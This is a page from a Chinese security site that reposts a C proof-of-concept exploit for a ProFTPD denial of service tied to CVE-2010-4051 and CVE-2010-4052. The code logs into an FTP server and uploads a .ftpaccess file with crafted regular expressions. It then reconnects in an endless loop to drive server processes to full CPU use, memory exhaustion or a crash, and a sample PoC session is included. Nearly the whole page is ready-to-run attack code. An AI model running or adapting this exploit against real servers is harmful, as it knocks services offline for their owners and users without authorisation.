首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
proftpd multiple exploit for VU#912279 (only with GNU libc/regcomp(3))
来源:http://securityreason.com/ 作者:Arciemowicz 发布时间:2011-01-10   
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/* 

proftpd multiple exploit for VU#912279 (only with GNU libc/regcomp(3))
by Maksymilian Arciemowicz

References:
http://www.kb.cert.org/vuls/id/912279
http://cxib.net/
http://securityreason.com/

Tested: 
Ubuntu + proftpd

This exploit need writing privileges to create .ftpaccess file with vulnerable regular expressions. Works well only under Linux

172.16.124.1 - NetBSD 5.1 (HACKER)
172.16.124.134 - Ubuntu 10.10 (TARGET)

PoC1:
.exitcx@cx64:~/advs/done$ ./reg1 172.16.124.134 21 cx password 172.16.124.1 1

Try create .ftpaccess with HideFiles "(\.ftpaccess|(.*{10,}{10,}{10,}{10,}))___FCKpd___0quot;
...
send: stat .

send: USER cx
PASS password

send: stat .

Can`t connect
.exit
cx@cx64:~/advs/done$ telnet 172.16.124.134 21
Trying 172.16.124.134...
telnet: Unable to connect to remote host: Connection refused

Resume: 
- created .ftpaccess file, and connect<=>disconnect
It will create a lot of proftpd children with 100% CPU usage.


If we try

./reg1 172.16.124.134 21 cx password 172.16.124.1 3

any proftpd children will generate memory exhausion

Options:
1 - cpu resource exhausion
2 - crash (recursion)
3 - memory resource exhausion
4 - possible crash with (ulimit {-v|-m})

*/


char expl0[]="HideFiles \"(\\.ftpaccess|(.*{10,}{10,}{10,}{10,}))$\"";  //CVE-2010-4052 Long execution
char expl1[]="HideFiles \"(\\.ftpaccess|(.*{10,}{10,}{10,}{10,}{10,}))$\""; //CVE-2010-4051 Crash
char expl2[]="HideFiles \"(.*+++++++++++++++++++++++++++++(\\w+))\""; // memory exhausion
char expl3[]="HideFiles \"(.*++++++++++++++++++++++++++++++(\\w+))\""; // if virtual memory limited, crash

int sendftp(int stream,char *what){
        if(-1==send(stream,what,strlen(what),0))
                printf("Can't send %s\n",what);
        else
                printf("send: %s\n",what);

        bzero(what,sizeof(what));
}

void readftp(int stream,int flag){
	if(flag==1) flag=MSG_DONTWAIT;
	else flag=0;
        char *readline=malloc(sizeof(char)*(4096+1));
	memset(readline,'\x00',(4096+1));
        if(recv(stream,readline,4096,flag)<1){
                printf("Can't read from stream\n");
		if(readline) free(readline);
		close(stream);
		exit(1);
	}
	else{
		if(readline)
			write(1, readline, strlen(readline));
		fflush(stdout);
	}
	free(readline);
}


int attack(host,port,login,pass)
char *host,*port,*login,*pass;
{
	char buffer[1024]; // send ftp command buffor
	int sockfd,n,error;
	struct addrinfo hints;
	struct addrinfo *res, *res0;

	memset(&hints, 0, sizeof(hints));
	hints.ai_family = PF_UNSPEC;
	hints.ai_socktype = SOCK_STREAM;
	error = getaddrinfo(host,port,&hints,&res0);

	if (error){
		errorcon:
		printf("Can`t connect\n.exit");
		exit(1);
	}

	if((sockfd=socket(res0->ai_family,res0->ai_socktype,res0->ai_protocol))<0) goto errorcon;
	if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon;

	snprintf(buffer,1024,"USER %s\nPASS %s\n",login,pass);
	sendftp(sockfd,buffer);

	bzero(buffer,1024);
	snprintf(buffer,1024,"STAT .\n");
	sendftp(sockfd,buffer);
	
	freeaddrinfo(res0);
	close(sockfd);
}

void exploreip(char *ip, int (*ipnum)[4]){
	char *wsk;
	
	wsk=(char *)strtok(ip,".");
	(*ipnum)[0]=atoi(wsk);
	wsk=(char *)strtok(NULL,".");
	(*ipnum)[1]=atoi(wsk);
	wsk=(char *)strtok(NULL,".");
	(*ipnum)[2]=atoi(wsk);
	wsk=(char *)strtok(NULL,".");
	(*ipnum)[3]=atoi(wsk);
}


int createexpl(host,port,login,pass,lip,pattern)
        char *host,*port,*login,*pass,*lip,*pattern;
{
        char buffer[1024]; // send ftp command buffor
        int ipnum[4];

        int sockfd,n,error,sendstream,binarystream,sendport = (1024 + getpid());

	struct addrinfo hints;
	struct addrinfo *res, *res0;
	struct sockaddr_in remo, loca;

	int len = sizeof(remo);
	
        memset(&hints, 0, sizeof(hints));
        hints.ai_family = PF_UNSPEC;
        hints.ai_socktype = SOCK_STREAM;
        error = getaddrinfo(host,port,&hints,&res0);

        if (error){
                errorcon:
		
		if(sendstream) close(sendstream);
		printf("Can`t connect\n.exit");
                exit(1);
        }

        if((sockfd=socket(res0->ai_family,res0->ai_socktype, res0->ai_protocol))<0)     goto errorcon;
        if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon;

        readftp(sockfd,1024);
        snprintf(buffer,1024,"USER %s\nPASS %s\n",login,pass);
        sendftp(sockfd,buffer);
        readftp(sockfd,1024);
	readftp(sockfd,1024);

	exploreip(lip,&ipnum);
        snprintf(buffer,1024,"TYPE I\nPORT %d,%d,%d,%d,%d,%d\n",ipnum[0],ipnum[1],ipnum[2],ipnum[3],sendport/256,sendport%256);
        sendftp(sockfd,buffer);
        readftp(sockfd,1024);
	
	bzero(&loca, sizeof(loca));
	loca.sin_family = AF_INET;
	loca.sin_port=htons(sendport);
	loca.sin_addr.s_addr = htonl(INADDR_ANY);

	if((sendstream=socket(AF_INET, SOCK_STREAM,0))<0) goto errorcon;
	if((bind(sendstream, (struct sockaddr *) &loca, sizeof(loca)))<0) goto errorcon;
	if(listen(sendstream, 10) < 0) goto errorcon;

	snprintf(buffer,1024,"STOR .ftpaccess\n");
        sendftp(sockfd,buffer);
	
        readftp(sockfd,1024);

	if((binarystream=accept(sendstream,(struct sockaddr *)&remo,&len)) < 0) goto errorcon;
	write(binarystream,pattern,strlen(pattern));
	
	freeaddrinfo(res0);
	close(sendstream);
	printf("Created .ftpaccess file with %s\nIt`s time to attack...\n",pattern);
	sleep(3);
	
	return 0;
}

void usage(){
	printf("Use: ./exploit target_ip port username password [your_ip] [option]\n\nCreate .ftpaccess with selected attack\noptions:\n1 - Long execution CVE-2010-4052\n2 - Recursion Crash CVE-2010-4051\n3 - Memory exhausion \n4 - Crash if virtual memory limited\n\n");
	exit(1);
}

int main(int argc,char *argv[])
{

        char *login,*pass,*lip=NULL;
        char logindef[]="anonymous",passdef[]="cx@127.0.0.1";

        printf("This is exploit for ERE (GNU libc)\nby Maksymilian Arciemowicz\n\n");

        if(argc<3) usage();

        char *host=argv[1];
        char *port=argv[2];

        if(4<=argc) login=argv[3];
        else login=logindef;

        if(5<=argc) pass=argv[4];
        else pass=passdef;

	if(6<=argc) lip=argv[5];
	
	if(7<=argc) switch(atoi(argv[6])){
		case 1:
			printf("Try create .ftpaccess with %s\n\n",expl0); 
			createexpl(host,port,login,pass,lip,expl0);
		break;
		
		case 2:
			printf("Try create .ftpaccess with %s\n\n",expl1);
			createexpl(host,port,login,pass,lip,expl1);
		break;
		
		case 3:
			printf("Try create .ftpaccess with %s\n\n",expl2);
			createexpl(host,port,login,pass,lip,expl2);
		break;
		
		case 4:
			printf("Try create .ftpaccess with %s\n\n",expl3);
			createexpl(host,port,login,pass,lip,expl3);
		break;
		
		default:
			usage();
		break;
	};

	while(1) attack(host,port,login,pass);
	
        return 0; // never happen
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Enzip 3.00 Buffer Overflow
·Enzip 3.00 Buffer Overflow Exp
·BS.Player 2.57 Buffer Overflow
·Microsoft Windows CreateSizedD
·VideoSpirit Pro <= v1.68 Local
·Concrete CMS 5.4.1.1 XSS / Cod
·NetSupport Manager Agent Remot
·HP Data Protector Manager v6.1
·Winamp 5.5.8 (in_mod plugin) S
·Linux Kernel CAP_SYS_ADMIN to
·Linux Kernel CAP_SYS_ADMIN to
·Concrete CMS v5.4.1.1 XSS/Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved